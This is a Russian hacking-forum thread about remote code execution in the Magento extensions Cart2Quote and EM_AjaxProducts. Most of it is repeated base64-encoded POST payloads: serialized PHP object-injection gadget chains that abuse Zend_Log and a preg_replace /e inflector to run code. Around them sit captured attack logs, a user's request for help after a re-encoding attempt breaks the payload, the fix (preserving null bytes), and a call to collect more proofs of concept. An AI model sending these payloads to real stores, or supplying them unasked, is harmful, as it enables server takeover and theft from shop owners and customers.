Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей Magento ] (https://forum.antichat.xyz/showthread.php?t=429973)

winstrool 07.09.2015 13:35
Баги+ФИКСЫ Magento

URL: index.php/qquoteadv/download/downloadCustomOption/

Module: Cart2Quote

POC:

POST: id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHR pb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxO ntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmV uZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVud HNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW9 1dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7T zo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0Ijt POjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY 3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI 6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZ SI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8 oKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7c zoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiI AKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=

URL: index.php/ajaxproducts/index/index/

Module: EM_AjaxProducts

POC:

POST: params=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJ vcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nI joxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDo iWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ld mVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2x heW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpb CI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V 0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZ mxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2U iOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguK ikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl 0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuY WJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW9 1dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047f X19fQ==

winstrool 21.08.2017 13:45
В меру лечения сайтов от вирусов и их безопасности, при снифинге запросов, был выявлен следующий shellcod RCE через унсериализацию данных в плагине:

в кодеровке base64:

Цитата:
Сообщение от None
YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb2 4iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntz OjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF 9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNU b01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dE V2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5 OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOj ExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3Rv ciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3 M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7 czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8oKS I7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czox MDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKg Bfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
Пример лога:

Цитата:
Сообщение от None
/*START_LOG*/ 141.101.[HIDEN] | POST | mage.[HIDEN].com/[HIDEN]/ | Mozilla/5.0 ([HIDEN])
--
POST[] id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHR pb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxO ntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmV uZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVud HNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW9 1dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7T zo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0Ijt POjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY 3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI 6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZ SI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8 oKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7c zoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiI AKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
/*END_LOG*/

crlf 22.08.2017 01:46
Цитата:
Сообщение от winstrool
winstrool said:

был выявлен следующий shellcod RCE через унсериализацию данных в плагине
Под первый зенд, cпаcибо

Что за плагин использовался, секрет?

t0ma5 22.08.2017 03:08
Цитата:
Сообщение от crlf
crlf said:

Под первый зенд, cпаcибо
Что за плагин использовался, секрет?
удваиваю, интересно где точка входа :|

winstrool 22.08.2017 14:05
Нет, не секрет, в паблике месяца 3 висит:

Цитата:
Сообщение от None
/*START_LOG*/ 141.101.[hiden] | POST | mage.[hiden]/index.php/qquoteadv/download/downloadCustomOption/ | Mozilla/5.0 ([Hiden])
--
POST[] id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHR pb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxO ntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmV uZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVud HNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW9 1dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7T zo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0Ijt POjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY 3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI 6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZ SI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8 oKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7c zoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiI AKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
/*END_LOG*/

nick_sale 29.08.2017 14:21
В чем может быть причина? Раскодировал,закодировал по новому - не работает.

Скиньте,раскодированный пример,который после новой перекодировки будет работать,ну и сервис,который нормально это все делает,а то сколько перепробовал - разные сервисы выдают разные варианты.

Начальная строка

YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb2 4iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntz OjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF 9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNU b01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dE V2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5 OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOj ExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3Rv ciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3 M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7 czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8oKS I7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czox MDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKg Bfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=

Раскодированная-закодированная по новому

YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb2 4iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntz OjExOiIgKiBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF 9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IiAqIF9ldmVudHNU b01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiICogX2xheW91dE V2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIgKiBfbWFpbCI7Tzo5 OiJaZW5kX01haWwiOjA6e31zOjEwOiIgKiBfbGF5b3V0IjtPOj ExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiICogX2luZmxlY3Rv ciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3 M6MTY6IiAqIF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7 czoxNToiICogX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8oKS I7fXM6MjA6IiAqIF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czox MDoiICogX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIgKi Bfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=

winstrool 29.08.2017 14:46
Каким редактором пользуйтесь? NULL байты потерлись... некоторые редакторы их затерают

nick_sale 29.08.2017 15:21
Цитата:
Сообщение от winstrool
winstrool said:

Каким редактором пользуйтесь? NULL байты потерлись... некоторые редакторы их затерают
https://www.base64decode.org/ - тут декодер

редактор notepad++ если я правильно понял

winstrool 29.08.2017 15:37
Цитата:
Сообщение от nick_sale
nick_sale said:

редактор notepad++ если я правильно понял
Да, я им пользуюсь и в нем же есть кодер/декодер, с ним у меня все норм работает.

winstrool 25.10.2018 11:36
В рамках темы hTTps://gwillem.gitlab.io/2018/10/23...tension-0days/ - предлагаю подбить список POC по этим модулям.


Время: 03:46